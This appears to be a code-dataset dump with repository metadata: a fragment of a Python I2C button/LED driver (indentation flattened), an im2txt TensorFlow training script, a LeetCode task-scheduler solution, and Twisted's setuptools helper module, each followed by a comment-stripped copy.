# Returns how many milliseconds it has been since the first
# button press. Since this returns a 32-bit int, it will
# roll over about every 50 days.
def time_since_first_press(self):
time_list = self._i2c.readBlock(self.address, self.PRESSED_QUEUE_BACK, 4)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2) + int(time_list[2]) * 16 ** (4) + int(time_list[3]) * 16 ** (6)
return time
# -------------------------------------------------------
# pop_pressed_queue()
#
# Returns the oldest value in the queue (milliseconds since
# first button press), and then removes it.
def pop_pressed_queue(self):
# Get the time in milliseconds since the button was first pressed
temp_data = self.time_since_first_press()
# Read PRESSED_QUEUE_STATUS register
pressed_queue_stat = self._i2c.readByte(self.address, self.PRESSED_QUEUE_STATUS)
self.pressed_pop_request = 1
# Set pop_request bit to 1
pressed_queue_stat = pressed_queue_stat | (self.pressed_pop_request)
self._i2c.writeByte(self.address, self.PRESSED_QUEUE_STATUS, pressed_queue_stat)
return temp_data
# ---------------------------------------------------------
# is_clicked_queue_full()
#
# Returns true if the queue of button click timestamps is full
# and false otherwise.
def is_clicked_queue_full(self):
# First, read the CLICKED_QUEUE_STATUS register
clicked_queue_stat = self._i2c.readByte(self.address, self.CLICKED_QUEUE_STATUS)
# Convert to binary and clear all bits but clicked_is_full
self.clicked_is_full = int(clicked_queue_stat) & ~(0xFB)
self.clicked_is_full = self.clicked_is_full >> 2
# Return clicked_is_full as a bool
return bool(self.clicked_is_full)
# ----------------------------------------------------------
# is_clicked_queue_empty()
#
    # Returns true if the queue of click timestamps is empty and false
# otherwise.
def is_clicked_queue_empty(self):
# First, read the CLICKED_QUEUE_STATUS register
clicked_queue_stat = self._i2c.readByte(self.address, self.CLICKED_QUEUE_STATUS)
# Convert to binary and clear all bits but clicked_is_empty
self.clicked_is_empty = int(clicked_queue_stat) & ~(0xFD)
# Shift clicked_is_empty to the zero bit
self.clicked_is_empty = self.clicked_is_empty >> 1
# Return clicked_is_empty as a bool
return bool(self.clicked_is_empty)
# ------------------------------------------------------------
# time_since_last_click()
#
# Returns how many milliseconds it has been since the last button
# click. Since this returns a 32-bit int, it will roll over about
# every 50 days
def time_since_last_click(self):
time_list = self._i2c.readBlock(self.address, self.CLICKED_QUEUE_FRONT, 4)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2) + int(time_list[2]) * 16 ** (4) + int(time_list[3]) * 16 ** (6)
return time
# ------------------------------------------------------------
# time_since_first_click()
#
# Returns how many milliseconds it has been since the first button
# click. Since this returns a 32-bit int, it will roll over about
# every 50 days
def time_since_first_click(self):
time_list = self._i2c.readBlock(self.address, self.CLICKED_QUEUE_BACK, 4)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2) + int(time_list[2]) * 16 ** (4) + int(time_list[3]) * 16 ** (6)
return time
# -------------------------------------------------------------
# pop_clicked_queue()
#
# Returns the oldest value in the queue (milliseconds since first
# button click), and then removes it.
def pop_clicked_queue(self):
# Get the time in milliseconds since the button was first clicked
temp_data = self.time_since_first_click()
# Read CLICKED_QUEUE_STATUS register
clicked_queue_stat = self._i2c.readByte(self.address, self.CLICKED_QUEUE_STATUS)
self.clicked_pop_request = 1
# Set pop_request bit to 1
clicked_queue_stat = clicked_queue_stat | (self.clicked_pop_request)
self._i2c.writeByte(self.address, self.CLICKED_QUEUE_STATUS, clicked_queue_stat)
return temp_data
# -------------------------------------------------------------
# LED_config(brightness, cycle_time, off_time, granularity)
#
# Configures the LED with the given max brightness, granularity
# (1 is fine for most applications), cycle time, and off time.
def LED_config(self, brightness, cycle_time, off_time, granularity = 1):
# Write brightness
self._i2c.writeByte(self.address, self.LED_BRIGHTNESS, brightness)
# Write cycle_time
self._i2c.writeWord(self.address, self.LED_PULSE_CYCLE_TIME, cycle_time)
# Write off_time
self._i2c.writeWord(self.address, self.LED_PULSE_OFF_TIME, off_time)
# Write granularity
self._i2c.writeByte(self.address, self.LED_PULSE_GRANULARITY, granularity)
# --------------------------------------------------------------
# LED_off()
#
# Turn the onboard LED off
def LED_off(self):
self.LED_config(0, 0, 0)
# --------------------------------------------------------------
# LED_on(brightness)
#
# Turns the onboard LED on with specified brightness. Set brightness
# to an integer between 0 and 255, where 0 is off and 255 is max
# brightness.
def LED_on(self, brightness):
self.LED_config(brightness, 0, 0)
| true
| true
|
1c421b356518bf4c59535b3263ca030af4edeada
| 3,562
|
py
|
Python
|
im2txt/train.py
|
iamdebanjangoswami/Image-Caption-IR--Im2txt
|
e871cdd03c80fd70695ae5a46f32351e35956684
|
[
"MIT"
] | 5
|
2018-07-17T16:10:02.000Z
|
2018-07-17T21:53:37.000Z
|
im2txt/train.py
|
iamdebanjangoswami/Image-Caption-IR--Im2txt
|
e871cdd03c80fd70695ae5a46f32351e35956684
|
[
"MIT"
] | null | null | null |
im2txt/train.py
|
iamdebanjangoswami/Image-Caption-IR--Im2txt
|
e871cdd03c80fd70695ae5a46f32351e35956684
|
[
"MIT"
] | null | null | null |
"""Train the model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from im2txt import configuration
from im2txt import show_and_tell_model
FLAGS = tf.app.flags.FLAGS
tf.flags.DEFINE_string("input_file_pattern", "",
"File pattern of sharded TFRecord input files.")
tf.flags.DEFINE_string("inception_checkpoint_file", "",
"Path to a pretrained inception_v3 model.")
tf.flags.DEFINE_string("train_dir", "",
"Directory for saving and loading model checkpoints.")
tf.flags.DEFINE_boolean("train_inception", False,
"Whether to train inception submodel variables.")
tf.flags.DEFINE_integer("number_of_steps", 1000000, "Number of training steps.")
tf.flags.DEFINE_integer("log_every_n_steps", 1,
"Frequency at which loss and global step are logged.")
tf.logging.set_verbosity(tf.logging.INFO)
def main(unused_argv):
assert FLAGS.input_file_pattern, "--input_file_pattern is required"
assert FLAGS.train_dir, "--train_dir is required"
model_config = configuration.ModelConfig()
model_config.input_file_pattern = FLAGS.input_file_pattern
model_config.inception_checkpoint_file = FLAGS.inception_checkpoint_file
training_config = configuration.TrainingConfig()
# Create training directory.
train_dir = FLAGS.train_dir
if not tf.gfile.IsDirectory(train_dir):
tf.logging.info("Creating training directory: %s", train_dir)
tf.gfile.MakeDirs(train_dir)
# Build the TensorFlow graph.
g = tf.Graph()
with g.as_default():
# Build the model.
model = show_and_tell_model.ShowAndTellModel(
model_config, mode="train", train_inception=FLAGS.train_inception)
model.build()
# Set up the learning rate.
learning_rate_decay_fn = None
if FLAGS.train_inception:
learning_rate = tf.constant(training_config.train_inception_learning_rate)
else:
learning_rate = tf.constant(training_config.initial_learning_rate)
if training_config.learning_rate_decay_factor > 0:
num_batches_per_epoch = (training_config.num_examples_per_epoch /
model_config.batch_size)
decay_steps = int(num_batches_per_epoch *
training_config.num_epochs_per_decay)
def _learning_rate_decay_fn(learning_rate, global_step):
return tf.train.exponential_decay(
learning_rate,
global_step,
decay_steps=decay_steps,
decay_rate=training_config.learning_rate_decay_factor,
staircase=True)
learning_rate_decay_fn = _learning_rate_decay_fn
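      # For reference (added comment): tf.train.exponential_decay with
      # staircase=True computes
      #   decayed_lr = learning_rate * decay_rate ** floor(global_step / decay_steps)
      # so the rate drops by learning_rate_decay_factor once per
      # num_epochs_per_decay epochs.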
# Set up the training ops.
train_op = tf.contrib.layers.optimize_loss(
loss=model.total_loss,
global_step=model.global_step,
learning_rate=learning_rate,
optimizer=training_config.optimizer,
clip_gradients=training_config.clip_gradients,
learning_rate_decay_fn=learning_rate_decay_fn)
# Set up the Saver for saving and restoring model checkpoints.
saver = tf.train.Saver(max_to_keep=training_config.max_checkpoints_to_keep)
# Run training.
tf.contrib.slim.learning.train(
train_op,
train_dir,
log_every_n_steps=FLAGS.log_every_n_steps,
graph=g,
global_step=model.global_step,
number_of_steps=FLAGS.number_of_steps,
init_fn=model.init_fn,
saver=saver)
if __name__ == "__main__":
tf.app.run()
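# One possible invocation from the repository root (illustrative paths only;
# the flag names match those defined above):
#
#   python -m im2txt.train \
#     --input_file_pattern="${DATA_DIR}/train-?????-of-00256" \
#     --inception_checkpoint_file="${INCEPTION_CHECKPOINT}" \
#     --train_dir="${MODEL_DIR}/train" \
#     --train_inception=false \
#     --number_of_steps=1000000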
| 34.921569
| 80
| 0.71196
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from im2txt import configuration
from im2txt import show_and_tell_model
FLAGS = tf.app.flags.FLAGS
tf.flags.DEFINE_string("input_file_pattern", "",
"File pattern of sharded TFRecord input files.")
tf.flags.DEFINE_string("inception_checkpoint_file", "",
"Path to a pretrained inception_v3 model.")
tf.flags.DEFINE_string("train_dir", "",
"Directory for saving and loading model checkpoints.")
tf.flags.DEFINE_boolean("train_inception", False,
"Whether to train inception submodel variables.")
tf.flags.DEFINE_integer("number_of_steps", 1000000, "Number of training steps.")
tf.flags.DEFINE_integer("log_every_n_steps", 1,
"Frequency at which loss and global step are logged.")
tf.logging.set_verbosity(tf.logging.INFO)
def main(unused_argv):
assert FLAGS.input_file_pattern, "--input_file_pattern is required"
assert FLAGS.train_dir, "--train_dir is required"
model_config = configuration.ModelConfig()
model_config.input_file_pattern = FLAGS.input_file_pattern
model_config.inception_checkpoint_file = FLAGS.inception_checkpoint_file
training_config = configuration.TrainingConfig()
train_dir = FLAGS.train_dir
if not tf.gfile.IsDirectory(train_dir):
tf.logging.info("Creating training directory: %s", train_dir)
tf.gfile.MakeDirs(train_dir)
g = tf.Graph()
with g.as_default():
model = show_and_tell_model.ShowAndTellModel(
model_config, mode="train", train_inception=FLAGS.train_inception)
model.build()
learning_rate_decay_fn = None
if FLAGS.train_inception:
learning_rate = tf.constant(training_config.train_inception_learning_rate)
else:
learning_rate = tf.constant(training_config.initial_learning_rate)
if training_config.learning_rate_decay_factor > 0:
num_batches_per_epoch = (training_config.num_examples_per_epoch /
model_config.batch_size)
decay_steps = int(num_batches_per_epoch *
training_config.num_epochs_per_decay)
def _learning_rate_decay_fn(learning_rate, global_step):
return tf.train.exponential_decay(
learning_rate,
global_step,
decay_steps=decay_steps,
decay_rate=training_config.learning_rate_decay_factor,
staircase=True)
learning_rate_decay_fn = _learning_rate_decay_fn
train_op = tf.contrib.layers.optimize_loss(
loss=model.total_loss,
global_step=model.global_step,
learning_rate=learning_rate,
optimizer=training_config.optimizer,
clip_gradients=training_config.clip_gradients,
learning_rate_decay_fn=learning_rate_decay_fn)
saver = tf.train.Saver(max_to_keep=training_config.max_checkpoints_to_keep)
tf.contrib.slim.learning.train(
train_op,
train_dir,
log_every_n_steps=FLAGS.log_every_n_steps,
graph=g,
global_step=model.global_step,
number_of_steps=FLAGS.number_of_steps,
init_fn=model.init_fn,
saver=saver)
if __name__ == "__main__":
tf.app.run()
| true
| true
|
1c421ba5cc25e81faa06ed54d8a9d618d0e83d7d
| 745
|
py
|
Python
|
task_scheduler_alt.py
|
tusharsadhwani/leetcode
|
a17a8a7587c5654f05fcd13ae7cdf47263ab2ea8
|
[
"MIT"
] | 6
|
2021-05-21T01:10:42.000Z
|
2021-12-16T16:12:30.000Z
|
task_scheduler_alt.py
|
tusharsadhwani/leetcode
|
a17a8a7587c5654f05fcd13ae7cdf47263ab2ea8
|
[
"MIT"
] | null | null | null |
task_scheduler_alt.py
|
tusharsadhwani/leetcode
|
a17a8a7587c5654f05fcd13ae7cdf47263ab2ea8
|
[
"MIT"
] | null | null | null |
from collections import Counter
class Solution:
def leastInterval(self, tasks: list[str], n: int) -> int:
counters = list(Counter(tasks).values())
counters.sort()
max_freq = counters.pop()
max_idle_time = (max_freq - 1) * n
idle_time = max_idle_time
while counters and idle_time > 0:
idle_time -= min(max_freq - 1, counters.pop())
if idle_time < 0:
idle_time = 0
return len(tasks) + idle_time
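    # Worked example (added for clarity): tasks = [A, A, A, B, B, B], n = 2.
    # max_freq = 3, so max_idle_time = (3 - 1) * 2 = 4; the three B's fill
    # min(max_freq - 1, 3) = 2 idle slots, leaving idle_time = 2, and the
    # answer is 6 + 2 = 8 intervals (A B _ A B _ A B).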
tests = [
(
(["A", "A", "A", "B", "B", "B"], 2,),
8,
),
(
(["A", "A", "A", "B", "B", "B"], 0,),
6,
),
(
(["A", "A", "A", "A", "A", "A", "B", "C", "D", "E", "F", "G"], 2,),
16,
),
]
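# A small check harness for the cases above (added as an illustration; the
# original snippet defines `tests` but no runner):
if __name__ == "__main__":
    for (tasks, n), expected in tests:
        result = Solution().leastInterval(tasks, n)
        assert result == expected, (tasks, n, result, expected)
    print("all {} cases passed".format(len(tests)))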
| 21.285714
| 75
| 0.436242
|
from collections import Counter
class Solution:
def leastInterval(self, tasks: list[str], n: int) -> int:
counters = list(Counter(tasks).values())
counters.sort()
max_freq = counters.pop()
max_idle_time = (max_freq - 1) * n
idle_time = max_idle_time
while counters and idle_time > 0:
idle_time -= min(max_freq - 1, counters.pop())
if idle_time < 0:
idle_time = 0
return len(tasks) + idle_time
tests = [
(
(["A", "A", "A", "B", "B", "B"], 2,),
8,
),
(
(["A", "A", "A", "B", "B", "B"], 0,),
6,
),
(
(["A", "A", "A", "A", "A", "A", "B", "C", "D", "E", "F", "G"], 2,),
16,
),
]
| true
| true
|
1c421bda6f16f21a6ab023a696c0e57cf3193402
| 14,249
|
py
|
Python
|
src/twisted/python/_setup.py
|
tirkarthi/twisted
|
74f1e5418742b5404210e4799ee1b914ef1f646b
|
[
"Unlicense",
"MIT"
] | null | null | null |
src/twisted/python/_setup.py
|
tirkarthi/twisted
|
74f1e5418742b5404210e4799ee1b914ef1f646b
|
[
"Unlicense",
"MIT"
] | null | null | null |
src/twisted/python/_setup.py
|
tirkarthi/twisted
|
74f1e5418742b5404210e4799ee1b914ef1f646b
|
[
"Unlicense",
"MIT"
] | null | null | null |
# -*- test-case-name: twisted.python.test.test_setup -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
# pylint: disable=I0011,C0103,C9302,W9401,W9402
"""
Setuptools convenience functionality.
This file must not import anything from Twisted, as it is loaded by C{exec} in
C{setup.py}. If you need compatibility functions for this code, duplicate them
here.
@var _EXTRA_OPTIONS: These are the actual package names and versions that will
be used by C{extras_require}. This is not passed to setup directly so that
combinations of the packages can be created without the need to copy
package names multiple times.
@var _EXTRAS_REQUIRE: C{extras_require} is a dictionary of items that can be
passed to setup.py to install optional dependencies. For example, to
install the optional dev dependencies one would type::
pip install -e ".[dev]"
This has been supported by setuptools since 0.5a4.
@var _PLATFORM_INDEPENDENT: A list of all optional cross-platform dependencies,
as setuptools version specifiers, used to populate L{_EXTRAS_REQUIRE}.
@var _EXTENSIONS: The list of L{ConditionalExtension} used by the setup
process.
@var notPortedModules: Modules that are not yet ported to Python 3.
"""
import io
import os
import platform
import re
import sys
from distutils.command import build_ext
from distutils.errors import CompileError
from setuptools import Extension, find_packages
from setuptools.command.build_py import build_py
# Do not replace this with t.p.compat imports, this file must not import
# from Twisted. See the docstring.
if sys.version_info < (3, 0):
_PY3 = False
else:
_PY3 = True
STATIC_PACKAGE_METADATA = dict(
name="Twisted",
description="An asynchronous networking framework written in Python",
author="Twisted Matrix Laboratories",
author_email="twisted-python@twistedmatrix.com",
maintainer="Glyph Lefkowitz",
maintainer_email="glyph@twistedmatrix.com",
url="https://twistedmatrix.com/",
project_urls={
'Documentation': 'https://twistedmatrix.com/documents/current/',
'Source': 'https://github.com/twisted/twisted',
'Issues': 'https://twistedmatrix.com/trac/report',
},
license="MIT",
classifiers=[
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
],
python_requires='>=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*',
)
_dev = [
'pyflakes >= 1.0.0',
'twisted-dev-tools >= 0.0.2',
'python-subunit',
'sphinx >= 1.3.1',
'towncrier >= 17.4.0'
]
if not _PY3:
# These modules do not yet work on Python 3.
_dev += [
'twistedchecker >= 0.4.0',
'pydoctor >= 16.2.0',
]
_EXTRA_OPTIONS = dict(
dev=_dev,
tls=[
'pyopenssl >= 16.0.0',
# service_identity 18.1.0 added support for validating IP addresses in
# certificate subjectAltNames
'service_identity >= 18.1.0',
# idna 2.3 introduced some changes that break a few things. Avoid it.
# The problems were fixed in 2.4.
'idna >= 0.6, != 2.3',
],
conch=[
'pyasn1',
'cryptography >= 2.6',
'appdirs >= 1.4.0',
'bcrypt >= 3.0.0',
],
soap=['soappy'],
serial=['pyserial >= 3.0',
'pywin32 != 226; platform_system == "Windows"'],
macos=['pyobjc-core',
'pyobjc-framework-CFNetwork',
'pyobjc-framework-Cocoa'],
windows=['pywin32 != 226'],
http2=['h2 >= 3.0, < 4.0',
'priority >= 1.1.0, < 2.0'],
)
_PLATFORM_INDEPENDENT = (
_EXTRA_OPTIONS['tls'] +
_EXTRA_OPTIONS['conch'] +
_EXTRA_OPTIONS['soap'] +
_EXTRA_OPTIONS['serial'] +
_EXTRA_OPTIONS['http2']
)
_EXTRAS_REQUIRE = {
'dev': _EXTRA_OPTIONS['dev'],
'tls': _EXTRA_OPTIONS['tls'],
'conch': _EXTRA_OPTIONS['conch'],
'soap': _EXTRA_OPTIONS['soap'],
'serial': _EXTRA_OPTIONS['serial'],
'http2': _EXTRA_OPTIONS['http2'],
'all_non_platform': _PLATFORM_INDEPENDENT,
'macos_platform': (
_EXTRA_OPTIONS['macos'] + _PLATFORM_INDEPENDENT
),
'windows_platform': (
_EXTRA_OPTIONS['windows'] + _PLATFORM_INDEPENDENT
),
}
_EXTRAS_REQUIRE['osx_platform'] = _EXTRAS_REQUIRE['macos_platform']
# Scripts provided by Twisted on Python 2 and 3.
_CONSOLE_SCRIPTS = [
"ckeygen = twisted.conch.scripts.ckeygen:run",
"cftp = twisted.conch.scripts.cftp:run",
"conch = twisted.conch.scripts.conch:run",
"mailmail = twisted.mail.scripts.mailmail:run",
"pyhtmlizer = twisted.scripts.htmlizer:run",
"tkconch = twisted.conch.scripts.tkconch:run",
"trial = twisted.scripts.trial:run",
"twist = twisted.application.twist._twist:Twist.main",
"twistd = twisted.scripts.twistd:run",
]
class ConditionalExtension(Extension, object):
"""
An extension module that will only be compiled if certain conditions are
met.
@param condition: A callable of one argument which returns True or False to
indicate whether the extension should be built. The argument is an
instance of L{build_ext_twisted}, which has useful methods for checking
things about the platform.
"""
def __init__(self, *args, **kwargs):
self.condition = kwargs.pop("condition", lambda builder: True)
Extension.__init__(self, *args, **kwargs)
# The C extensions used for Twisted.
_EXTENSIONS = [
ConditionalExtension(
"twisted.test.raiser",
sources=["src/twisted/test/raiser.c"],
condition=lambda _: _isCPython),
ConditionalExtension(
"twisted.internet.iocpreactor.iocpsupport",
sources=[
"src/twisted/internet/iocpreactor/iocpsupport/iocpsupport.c",
"src/twisted/internet/iocpreactor/iocpsupport/winsock_pointers.c",
],
libraries=["ws2_32"],
condition=lambda _: _isCPython and sys.platform == "win32"),
ConditionalExtension(
"twisted.python._sendmsg",
sources=["src/twisted/python/_sendmsg.c"],
condition=lambda _: not _PY3 and sys.platform != "win32"),
]
def _longDescriptionArgsFromReadme(readme):
"""
Generate a PyPI long description from the readme.
@param readme: Path to the readme reStructuredText file.
@type readme: C{str}
@return: Keyword arguments to be passed to C{setuptools.setup()}.
@rtype: C{str}
"""
with io.open(readme, encoding='utf-8') as f:
readmeRst = f.read()
# Munge links of the form `NEWS <NEWS.rst>`_ to point at the appropriate
# location on GitHub so that they function when the long description is
# displayed on PyPI.
longDesc = re.sub(
r'`([^`]+)\s+<(?!https?://)([^>]+)>`_',
r'`\1 <https://github.com/twisted/twisted/blob/trunk/\2>`_',
readmeRst,
flags=re.I,
)
return {
'long_description': longDesc,
'long_description_content_type': 'text/x-rst',
}
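# Illustrative note (not in the original source): the substitution above turns
# a relative reST link such as
#   `NEWS <NEWS.rst>`_
# into an absolute GitHub link:
#   `NEWS <https://github.com/twisted/twisted/blob/trunk/NEWS.rst>`_
# while links that already start with http:// or https:// are left untouched.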
def getSetupArgs(extensions=_EXTENSIONS, readme='README.rst'):
"""
Generate arguments for C{setuptools.setup()}
@param extensions: C extension modules to maybe build. This argument is to
be used for testing.
@type extensions: C{list} of C{ConditionalExtension}
@param readme: Path to the readme reStructuredText file. This argument is
to be used for testing.
@type readme: C{str}
@return: The keyword arguments to be used by the setup method.
@rtype: L{dict}
"""
arguments = STATIC_PACKAGE_METADATA.copy()
if readme:
arguments.update(_longDescriptionArgsFromReadme(readme))
# This is a workaround for distutils behavior; ext_modules isn't
# actually used by our custom builder. distutils deep-down checks
# to see if there are any ext_modules defined before invoking
# the build_ext command. We need to trigger build_ext regardless
# because it is the thing that does the conditional checks to see
# if it should build any extensions. The reason we have to delay
# the conditional checks until then is that the compiler objects
# are not yet set up when this code is executed.
arguments["ext_modules"] = extensions
    # Use a custom class to build the extensions.
class my_build_ext(build_ext_twisted):
conditionalExtensions = extensions
command_classes = {
'build_ext': my_build_ext,
}
if sys.version_info[0] >= 3:
command_classes['build_py'] = BuildPy3
requirements = [
"zope.interface >= 4.4.2",
"constantly >= 15.1",
"incremental >= 16.10.1",
"Automat >= 0.3.0",
"hyperlink >= 17.1.1",
# PyHamcrest 1.10.0 is Python 3 only, but lacks package metadata that
# says so. This condition can be dropped when Twisted drops support for
# Python 2.7.
"PyHamcrest >= 1.9.0, != 1.10.0",
"attrs >= 19.2.0",
]
arguments.update(dict(
packages=find_packages("src"),
use_incremental=True,
setup_requires=["incremental >= 16.10.1"],
install_requires=requirements,
entry_points={
'console_scripts': _CONSOLE_SCRIPTS
},
cmdclass=command_classes,
include_package_data=True,
exclude_package_data={
"": ["*.c", "*.h", "*.pxi", "*.pyx", "build.bat"],
},
zip_safe=False,
extras_require=_EXTRAS_REQUIRE,
package_dir={"": "src"},
))
return arguments
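# Typical use (illustrative, assuming a setup.py that imports this module):
#
#   setuptools.setup(**getSetupArgs())
#
# so the conditional extensions and extras defined above are evaluated at
# install time.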
class BuildPy3(build_py, object):
"""
A version of build_py that doesn't install the modules that aren't yet
ported to Python 3.
"""
def find_package_modules(self, package, package_dir):
modules = [
module for module
in build_py.find_package_modules(self, package, package_dir)
if ".".join([module[0], module[1]]) not in notPortedModules]
return modules
## Helpers and distutils tweaks
class build_ext_twisted(build_ext.build_ext, object):
"""
Allow subclasses to easily detect and customize Extensions to
build at install-time.
"""
def prepare_extensions(self):
"""
Prepare the C{self.extensions} attribute (used by
L{build_ext.build_ext}) by checking which extensions in
I{conditionalExtensions} should be built. In addition, if we are
building on NT, define the WIN32 macro to 1.
"""
# always define WIN32 under Windows
if os.name == 'nt':
self.define_macros = [("WIN32", 1)]
else:
self.define_macros = []
# On Solaris 10, we need to define the _XOPEN_SOURCE and
# _XOPEN_SOURCE_EXTENDED macros to build in order to gain access to
# the msg_control, msg_controllen, and msg_flags members in
# sendmsg.c. (according to
# https://stackoverflow.com/questions/1034587). See the documentation
# of X/Open CAE in the standards(5) man page of Solaris.
if sys.platform.startswith('sunos'):
self.define_macros.append(('_XOPEN_SOURCE', 1))
self.define_macros.append(('_XOPEN_SOURCE_EXTENDED', 1))
self.extensions = [
x for x in self.conditionalExtensions if x.condition(self)
]
for ext in self.extensions:
ext.define_macros.extend(self.define_macros)
def build_extensions(self):
"""
Check to see which extension modules to build and then build them.
"""
self.prepare_extensions()
build_ext.build_ext.build_extensions(self)
def _remove_conftest(self):
for filename in ("conftest.c", "conftest.o", "conftest.obj"):
try:
os.unlink(filename)
except EnvironmentError:
pass
def _compile_helper(self, content):
conftest = open("conftest.c", "w")
try:
with conftest:
conftest.write(content)
try:
self.compiler.compile(["conftest.c"], output_dir='')
except CompileError:
return False
return True
finally:
self._remove_conftest()
def _check_header(self, header_name):
"""
Check if the given header can be included by trying to compile a file
that contains only an #include line.
"""
self.compiler.announce("checking for {} ...".format(header_name), 0)
return self._compile_helper("#include <{}>\n".format(header_name))
def _checkCPython(sys=sys, platform=platform):
"""
Checks if this implementation is CPython.
This uses C{platform.python_implementation}.
This takes C{sys} and C{platform} kwargs that by default use the real
modules. You shouldn't care about these -- they are for testing purposes
only.
@return: C{False} if the implementation is definitely not CPython, C{True}
otherwise.
"""
return platform.python_implementation() == "CPython"
_isCPython = _checkCPython()
notPortedModules = [
"twisted.mail.alias",
"twisted.mail.bounce",
"twisted.mail.mail",
"twisted.mail.maildir",
"twisted.mail.pb",
"twisted.mail.relaymanager",
"twisted.mail.scripts.__init__",
"twisted.mail.tap",
"twisted.mail.test.test_bounce",
"twisted.mail.test.test_mail",
"twisted.mail.test.test_options",
"twisted.mail.test.test_scripts",
"twisted.news.__init__",
"twisted.news.database",
"twisted.news.news",
"twisted.news.nntp",
"twisted.news.tap",
"twisted.news.test.__init__",
"twisted.news.test.test_database",
"twisted.news.test.test_news",
"twisted.news.test.test_nntp",
"twisted.plugins.twisted_mail",
"twisted.plugins.twisted_news",
"twisted.protocols.shoutcast",
"twisted.python.finalize",
"twisted.python.hook",
"twisted.python.test.cmodulepullpipe",
"twisted.python.test.test_pydoctor",
"twisted.python.test.test_win32",
"twisted.test.test_hook",
"twisted.web.soap",
"twisted.web.test.test_soap",
]
| 31.524336
| 79
| 0.644186
|
import io
import os
import platform
import re
import sys
from distutils.command import build_ext
from distutils.errors import CompileError
from setuptools import Extension, find_packages
from setuptools.command.build_py import build_py
if sys.version_info < (3, 0):
_PY3 = False
else:
_PY3 = True
STATIC_PACKAGE_METADATA = dict(
name="Twisted",
description="An asynchronous networking framework written in Python",
author="Twisted Matrix Laboratories",
author_email="twisted-python@twistedmatrix.com",
maintainer="Glyph Lefkowitz",
maintainer_email="glyph@twistedmatrix.com",
url="https://twistedmatrix.com/",
project_urls={
'Documentation': 'https://twistedmatrix.com/documents/current/',
'Source': 'https://github.com/twisted/twisted',
'Issues': 'https://twistedmatrix.com/trac/report',
},
license="MIT",
classifiers=[
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
],
python_requires='>=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*',
)
_dev = [
'pyflakes >= 1.0.0',
'twisted-dev-tools >= 0.0.2',
'python-subunit',
'sphinx >= 1.3.1',
'towncrier >= 17.4.0'
]
if not _PY3:
_dev += [
'twistedchecker >= 0.4.0',
'pydoctor >= 16.2.0',
]
_EXTRA_OPTIONS = dict(
dev=_dev,
tls=[
'pyopenssl >= 16.0.0',
'service_identity >= 18.1.0',
'idna >= 0.6, != 2.3',
],
conch=[
'pyasn1',
'cryptography >= 2.6',
'appdirs >= 1.4.0',
'bcrypt >= 3.0.0',
],
soap=['soappy'],
serial=['pyserial >= 3.0',
'pywin32 != 226; platform_system == "Windows"'],
macos=['pyobjc-core',
'pyobjc-framework-CFNetwork',
'pyobjc-framework-Cocoa'],
windows=['pywin32 != 226'],
http2=['h2 >= 3.0, < 4.0',
'priority >= 1.1.0, < 2.0'],
)
_PLATFORM_INDEPENDENT = (
_EXTRA_OPTIONS['tls'] +
_EXTRA_OPTIONS['conch'] +
_EXTRA_OPTIONS['soap'] +
_EXTRA_OPTIONS['serial'] +
_EXTRA_OPTIONS['http2']
)
_EXTRAS_REQUIRE = {
'dev': _EXTRA_OPTIONS['dev'],
'tls': _EXTRA_OPTIONS['tls'],
'conch': _EXTRA_OPTIONS['conch'],
'soap': _EXTRA_OPTIONS['soap'],
'serial': _EXTRA_OPTIONS['serial'],
'http2': _EXTRA_OPTIONS['http2'],
'all_non_platform': _PLATFORM_INDEPENDENT,
'macos_platform': (
_EXTRA_OPTIONS['macos'] + _PLATFORM_INDEPENDENT
),
'windows_platform': (
_EXTRA_OPTIONS['windows'] + _PLATFORM_INDEPENDENT
),
}
_EXTRAS_REQUIRE['osx_platform'] = _EXTRAS_REQUIRE['macos_platform']
_CONSOLE_SCRIPTS = [
"ckeygen = twisted.conch.scripts.ckeygen:run",
"cftp = twisted.conch.scripts.cftp:run",
"conch = twisted.conch.scripts.conch:run",
"mailmail = twisted.mail.scripts.mailmail:run",
"pyhtmlizer = twisted.scripts.htmlizer:run",
"tkconch = twisted.conch.scripts.tkconch:run",
"trial = twisted.scripts.trial:run",
"twist = twisted.application.twist._twist:Twist.main",
"twistd = twisted.scripts.twistd:run",
]
class ConditionalExtension(Extension, object):
def __init__(self, *args, **kwargs):
self.condition = kwargs.pop("condition", lambda builder: True)
Extension.__init__(self, *args, **kwargs)
_EXTENSIONS = [
ConditionalExtension(
"twisted.test.raiser",
sources=["src/twisted/test/raiser.c"],
condition=lambda _: _isCPython),
ConditionalExtension(
"twisted.internet.iocpreactor.iocpsupport",
sources=[
"src/twisted/internet/iocpreactor/iocpsupport/iocpsupport.c",
"src/twisted/internet/iocpreactor/iocpsupport/winsock_pointers.c",
],
libraries=["ws2_32"],
condition=lambda _: _isCPython and sys.platform == "win32"),
ConditionalExtension(
"twisted.python._sendmsg",
sources=["src/twisted/python/_sendmsg.c"],
condition=lambda _: not _PY3 and sys.platform != "win32"),
]
def _longDescriptionArgsFromReadme(readme):
with io.open(readme, encoding='utf-8') as f:
readmeRst = f.read()
longDesc = re.sub(
r'`([^`]+)\s+<(?!https?://)([^>]+)>`_',
r'`\1 <https://github.com/twisted/twisted/blob/trunk/\2>`_',
readmeRst,
flags=re.I,
)
return {
'long_description': longDesc,
'long_description_content_type': 'text/x-rst',
}
def getSetupArgs(extensions=_EXTENSIONS, readme='README.rst'):
arguments = STATIC_PACKAGE_METADATA.copy()
if readme:
arguments.update(_longDescriptionArgsFromReadme(readme))
# actually used by our custom builder. distutils deep-down checks
# to see if there are any ext_modules defined before invoking
# the build_ext command. We need to trigger build_ext regardless
# because it is the thing that does the conditional checks to see
# if it should build any extensions. The reason we have to delay
# the conditional checks until then is that the compiler objects
# are not yet set up when this code is executed.
